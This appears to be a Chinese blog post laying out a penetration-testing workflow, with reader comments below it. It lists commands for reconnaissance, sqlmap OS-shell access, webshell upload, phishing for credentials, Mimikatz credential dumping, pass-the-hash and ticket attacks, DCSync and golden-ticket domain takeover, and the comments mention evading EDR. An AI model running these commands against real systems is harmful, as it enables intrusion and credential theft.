AI智能摘要
AI 生成的文章内容摘要
一、渗透测试流程概览
信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写
---
二、信息收集阶段
2.1 外网信息收集

# 子域名枚举 subfinder -d target.com -o subs.txt # 端口扫描 nmap -sS -sV -p- target.com # 目录扫描 dirsearch -u http://target.com -e php,html,js # 指纹识别 whatweb http://target.com
2.2 社工库查询
- 邮箱泄露查询:haveibeenpwned.com - 密码泄露查询:dehashed.com - 企业邮箱格式:theHarvester
---
三、初始访问
3.1 Web 漏洞利用
# 文件上传漏洞 # 上传 webshell 到 /uploads/shell.php # SQL 注入 sqlmap -u "http://target.com/page?id=1" --os-shell # RCE 漏洞 # Struts2、WebLogic、Fastjson 等
3.2 钓鱼攻击
1. 伪造登录页面 2. 发送钓鱼邮件 3. 获取员工凭证 4. VPN 登录内网
---
四、权限提升
4.1 Windows 提权
# 检查系统信息 systeminfo whoami /priv # 检查补丁 wmic qfe list # 查找可执行文件 accesschk.exe -uwcqv "Authenticated Users" * /accepteula
4.2 linux 提权
# 检查内核版本 uname -a
# 检查 sudo 权限 sudo -l
# 检查 SUID 文件 find / -perm -u=s -type f 2>/dev/null
# 检查 cron 任务 cat /etc/crontab
---
五、横向移动
5.1 凭证窃取
# Mimikatz 抓取密码 mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords # 导出 hash mimikatz # lsadump::sam
5.2 传递攻击
# PtH(传递 hash) mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH # PtT(传递票据) mimikatz # kerberos::ptt admin.ccache
---
六、域控拿下
6.1 域信息收集
# 查看域信息 net domain nltest /domain_trusts # 查看域控 nltest /dclist:target.com # 查看域用户 net user /domain
6.2 黄金票据
# 获取 krbtgt hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt # 生成黄金票据 mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx
---
七、报告编写
7.1 报告结构
1. 执行摘要 2. 漏洞列表(按风险等级) 3. 详细利用过程 4. 修复建议 5. 附录(工具、命令)
---
作者:爪
分类:渗透测试
标签:内网渗透、域渗透、横向移动、提权技术、渗透测试
发布时间:2026-04-14

安徽省蚌埠市 1F
这流程图看着就头大,PtH和PtT到底有啥区别啊?
河南省信阳市 2F
之前搞域渗透时卡在黄金票据那步,krbtgt hash死活导不出来😭
日本 3F
mimikatz现在还能直接用?不是早被EDR盯死了吗🤔
澳大利亚 B1
@ 飞鸿踏雪 mimikatz现在确实难搞,得配合各种绕过手段才行
山东省临沂市 4F
又是命令堆砌,实测环境哪有这么顺利…
中国 5F
内网没打补丁的Win7真香,一打一个准😂
印度尼西亚 B1
@ 自行车 Win7早该退役了,内网还有这玩意也是离谱
日本 6F
求问黄金票据有效期能改吗?试了几次都超时了
韩国 7F
抓hash现在基本靠dump lsass了吧,mimikatz动静太大
北京市 8F
看着像教程,但没提绕过AMSI和杀软检测,新手照着做怕是要蓝屏
日本 9F
太硬核了,我还在信息收集阶段挣扎…
福建省厦门市 B1
@ 闪电划空 信息收集阶段+1,子域名枚举经常跑半天全是cdn😂
中国 10F
那个电路板图还挺酷,锁和钥匙的设计有点意思👍
湖南省衡阳市 11F
PtH是拿hash直接登录,PtT是拿票据,这俩底层不一样啊
浙江省杭州市 12F
黄金票据那步krbtgt hash导不出来太真实了,权限不够吧
日本 13F
那个图设计得确实可以,比纯文字好懂多了
澳大利亚 14F
EDR现在查mimikatz特征码挺狠的,得改改再用
上海市 15F
报告编写那段太真实了,修建议写来写去就那几句
韩国 16F
dirsearch现在用ffuf更多吧,速度差不少
湖北省武汉市 17F
绕过AMSI这块确实该讲讲,不然新手直接寄
北京市 18F
这命令堆得有点多,新手看着容易懵。
印度 19F
现在还用 mimikatz 直接跑?不被杀软秒删才怪。
日本 20F
黄金票据那步要是没域管权限根本搞不定吧?
香港 21F
之前搞内网渗透,光绕 AMSI 就折腾了我两天😭。
日本 22F
图倒是挺好看,就是实操起来全是坑。
浙江省 23F
PtH 和 PtT 到底选哪个更稳点?🤔
山东省滨州市 24F
报告里修复建议那块,每次写得我都想吐。
上海市 25F
Win7 确实好打,但现在哪还有多少没补丁的。
广东省 26F
dump lsass 现在也得小心内存扫描了吧。
北京市 27F
感觉少了点绕过 EDR 的思路,光给命令不够啊。
广东省广州市番禺区 28F
kerbtgt hash 导不出来是不是因为权限不够?
陕西省咸阳市 29F
这流程看着顺,实际环境里断网隔离咋整?
广东省 30F
黄金票据那步 sid 填错过好几次,坑得要死
瑞士 B1
@ 乒乓乓 sid 填错很常见,先确认域的 SID 再生成票据就不会踩坑了
中国 31F
PtH 和 PtT 的票据传递实际用起来挺绕的,容易卡壳